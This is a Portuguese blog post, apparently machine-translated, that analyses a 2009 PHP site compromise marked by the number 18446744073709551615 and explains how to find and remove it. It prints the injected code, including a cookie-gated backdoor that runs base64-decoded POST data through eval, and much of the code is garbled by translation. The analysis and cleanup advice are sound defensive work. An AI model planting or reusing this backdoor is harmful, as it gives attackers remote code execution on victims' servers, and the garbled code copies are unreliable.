Nos últimos dias, eu vejo um aumento nos casos de pirataria que a ação malévola aparentemente é para mostrar o fim da home page da vítima, o número "18446744073709551615".

Pesquisando na rede utilizando este número como uma chave de pesquisa você vai encontrar muitos dos artigos / posts que dizem que este é o número máximo usado dentro de um campo BIGINT em PHP. Isto levará o usuário desavisado para ir louco procurando a função no seu site, que realiza os cálculos que levam ao aparecimento deste número. Tudo isso será inútil!

Na verdade, esse número é apresentado e as páginas de "index.php" página de seu site foi invadido, inserindo nele a seguinte função, que não altera o comportamento da página que exibe, na parte inferior o número de página no assunto.

A página da revista será exibida com o seguinte código:

  1
 2
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20

 ( "security_update" ) ; //do not remove this line - important security update! <--- CODICE ORIGINALE DELLA PAGINA ---> ?> < ?php function security_update ( $buffer ) { $update = '18446744073709551615' ; if ( stristr ( $buffer , '</html' ) !== FALSE ) { return eregi_replace ( '</html' , $update . '<html' , $buffer ) ; } else { return $buffer . $update ; } } ?> <? Php ob_start ( "security_update"), / / Não retirar esta linha - importante atualização de segurança <--- página de código original ---> <? Security_update função PHP ($ buffer) ($ update = ' 18446744073709551615 'if (stristr ($ buffer, "</ html eregi_replace retorno')! == FALSE) (( '</ html', $ update". </ html ', $ buffer); buffer) else return ($. $ update ;))?> 

Como você pode ver o código, analisando o security_update "faz é colocar toda a produção de sua página em um buffer e, em seguida acrescentar ao valor tampão" 18446744073709551615 ".

A questão que se coloca é: porquê?

Embora eu estou mantendo um olho na evolução deste hack não foi ainda identificado o motivo para tal ação. A hipótese de que atualmente parece ser a mais verdadeira e que você está usando-o como um "marcador" sites "infectados" para que você possa facilmente encontrar em qualquer pesquisa na net.

Então, quem está fazendo esses cortes podem identificar as suas vítimas e os locais para saber que a falha de segurança que permitiu-lhe escrever, por agora, o número "18446744073709551615".

Vendo a tendência das últimas semanas tenho visto uma "evolução do script em que foi adicionada uma nova linha que poderia ser muito prejudicial para as vítimas. Este código em sua nova versão:

  1
 2
 3

 ( "security_update" ) ; //do not remove this line - important security update! if ( md5 ( $_COOKIE [ '73043475c0893e30' ] ) == "59fdd20854f4a2056c082cab53e64860" ) { eval ( base64_decode ( $_POST [ 'file' ] ) ) ; exit ; } ?> < ?php <? Php ob_start ( "security_update"), / / Não retirar esta linha - atualização de segurança importante! Se (md5 ($ _COOKIE ['73043475c0893e30 ']) == 59fdd20854f4a2056c082cab53e64860 ") (eval (base64_decode ($ _POST [' arquivo '])); saída;) <? php 

Este script tem mais de uma seleção em um cookie que, quando ocorreu ($ _COOKIE ['73043475c0893e30'])==" 59fdd20854f4a2056c082cab53e64860 "), realiza uma decodificação de um arquivo criptografado enviado por correio.

Desta forma, o hacker tem a capacidade de enviar arquivos para todos os domínios que anteriormente infectadas e "marca".

Por agora, não tenho visto ações concretas que têm tirado partido desta funcionalidade "security_update ()" mas, claro, é natural pensar que o roteiro e sua evoluções são várias etapas de uma acção destinada a levantar centenas de locais infectados para tornar mais um ataque em massa.

Como eliminar?

Para apagar apenas encontrar todas as páginas que mostram o número "18446744073709551615" e limpar o código do hack mostrado acima.

Novamente o "PoweGrep" nos remete confortável permitindo que você procure a cadeia "18446744073709551615" em todos os arquivos em seu site (local).

Uma vez identificadas, as páginas são removidas estas linhas a partir do topo da página:

  1
 2
 3

 ( "security_update" ) ; //do not remove this line - important security update! if ( md5 ( $_COOKIE [ '73043475c0893e30' ] ) == "59fdd20854f4a2056c082cab53e64860" ) { eval ( base64_decode ( $_POST [ 'file' ] ) ) ; exit ; } ?> <? Php ob_start ( "security_update"), / / Não retirar esta linha - atualização de segurança importante! Se (md5 ($ _COOKIE ['73043475c0893e30 ']) == 59fdd20854f4a2056c082cab53e64860 ") (eval (base64_decode ($ _POST [' arquivo '])); saída;)?> 

(linha 3 não está presente em todas as versões)

e estes regenerada a partir do final:

  1
 2
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14

                 security_update ( $buffer ) { $update = '18446744073709551615' ; if ( stristr ( $buffer , '</html' ) !== FALSE ) { return eregi_replace ( '</html' , $update . '<html' , $buffer ) ; } else { return $buffer . $update ; } } ?> Buffer <? Php security_update função ($ buffer) ($ update = '18446744073709551615 'if (stristr ($,' </ html eregi_replace retorno ')! == FALSE) ((' </ html ', $ update ". < html ', $ buffer);) else (return $ buffer. $ update ;))?> 

Possibilidade de infecção

Eu determinei, por agora, se a infecção ocorre através de uma vulnerabilidade em sua aplicação web ou se é através de FTP usando as credenciais do seu cliente de FTP.

Em ambos os casos, o conselho é sempre o mesmo e eles sempre fazem bem:

1) Verifique em instalações seguras, como a Secunia ea SecurityFocus ou Milw0rm quaisquer novas vulnerabilidades nas suas aplicações / scripts / cms.

2) Realizar exames periódicos completa dos seus PCs com o software anti-malware, spyware, etc. Particularmente aconselhável usar o Malwarebytes 'Anti-Malware, que inclui todas essas proteções em uma única solução

Qualquer um com informação sobre isso e queria compartilhá-los escrever para mim em capn3m0@capn3m0.org

ATUALIZAÇÃO 8 / 11/2009: [HACK] - Cannot redeclare security_update (), o final é aqui!